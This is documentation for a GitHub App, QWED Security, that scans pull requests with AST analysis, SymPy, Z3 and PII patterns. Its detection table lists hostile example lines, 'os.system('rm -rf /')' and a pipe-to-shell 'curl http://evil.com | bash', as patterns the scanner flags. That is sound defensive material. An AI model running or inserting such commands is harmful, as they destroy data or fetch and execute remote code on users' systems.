Skip to main content

QWED Security GitHub App

QWED Security is a GitHub App that automatically scans your Pull Requests using deterministic verification engines — not another LLM. It uses formal solvers (SymPy, Z3) and AST analysis to mathematically prove that code, math, and logic in your PRs are correct.
Unlike AI code reviewers that “guess,” QWED Security provides deterministic proof. 1+1 always equals 2.

How It Works

Pull Request Opened / Updated

GitHub Webhook → QWED Security App

QWEDLocal Verification Engine
  ├─ 🛡️ Code Security (AST Analysis)
  ├─ 🧮 Math Verification (SymPy)
  ├─ ⚖️ Logic Validation (Z3 Prover)
  └─ 🔒 PII Detection (Regex Patterns)

✅ Pass  or  ❌ Fail

Results posted as a GitHub Check Run
  1. A developer opens or updates a Pull Request
  2. GitHub sends a webhook event to the QWED Security App
  3. The app creates a Check Run (“QWED Security”) on the PR
  4. Files are scanned using QWEDLocal — QWED’s in-process verification engine
  5. Results are posted directly to the Checks tab on the PR

What QWED Security Catches

🛡️ Code Security (AST Analysis)

Detects dangerous code patterns before they reach production:
PatternExampleRisk
Shell injectionos.system('rm -rf /')Remote Code Execution
Eval/Execeval(user_input)Arbitrary code execution
Pipe-to-shellcurl http://evil.com | bashSupply chain attack
Hardcoded secretsapi_key = "sk-proj-..."Credential exposure
Unsafe importsimport subprocessPrivilege escalation

🧮 Math Verification (SymPy)

Validates mathematical formulas and constants — tax rate calculations, interest/NPV formulas, unit conversions, and financial compliance rules.

⚖️ Logic Validation (Z3 Prover)

Ensures boolean logic and business rules are satisfiable — contract clause contradictions, business rule conflicts, and constraint satisfaction.

🔒 PII Detection

Detects sensitive data before it enters your codebase — credit card numbers, Social Security Numbers, email addresses, and API keys.

Installation

  1. Visit the QWED Security App
  2. Click Install
  3. Select the repositories you want to protect
  4. Done — QWED Security will automatically scan new Pull Requests
The app is currently under GitHub publishing review. You can still use the direct app link for installation and updates.

Plans

PlanScopePrice
FreeOpen source & personal repositories$0
ProPrivate repositories, priority scanningComing soon

Check Run Output

When QWED Security scans a PR, you’ll see results directly in the Checks tab:

✅ All Clear

QWED Verification Report

✅ Verified Files
✅ math_logic.py: Passed
✅ api_handler.py: Passed

❌ Issues Found

QWED Verification Report

🚨 Issues Detected
❌ dangerous.py: SECURITY_RISK
  > Reason: Forbidden function 'os.system' detected

✅ Verified Files
✅ math_logic.py: Passed

Privacy & Security

  • No code storage: Files are analyzed in-memory and discarded
  • Webhook verification: HMAC-SHA256 signature validation
  • JWT authentication: Short-lived JWT tokens (10-minute expiry)
  • Open source engines: All verification logic is Apache 2.0

Permissions

PermissionAccessPurpose
ChecksRead & WriteCreate and update Check Runs on PRs
Pull RequestsReadRead PR metadata and trigger scans
ContentsReadRead repository files for verification

Configuration

QWED Security works out-of-the-box with zero configuration for Python projects. Simply install the app and it will start scanning PRs immediately.
  • Languages: Python, Go, Rust, and TypeScript
  • Trigger: Pull Request events (opened, synchronized, reopened)

QWED Security App vs GitHub Action

FeatureQWED Security (App)QWED GitHub Action
TypeInstalled GitHub AppCI/CD Action
SetupOne-click installAdd to workflow YAML
TriggerAutomatic on PRConfigured in workflow
VerificationCode security focusMath, Logic, Code, SQL
LLM RequiredNo (pure AST analysis)Optional (for translation)
The GitHub App provides automatic, zero-config PR scanning. The GitHub Action provides configurable verification within your CI/CD pipeline. They complement each other.

Support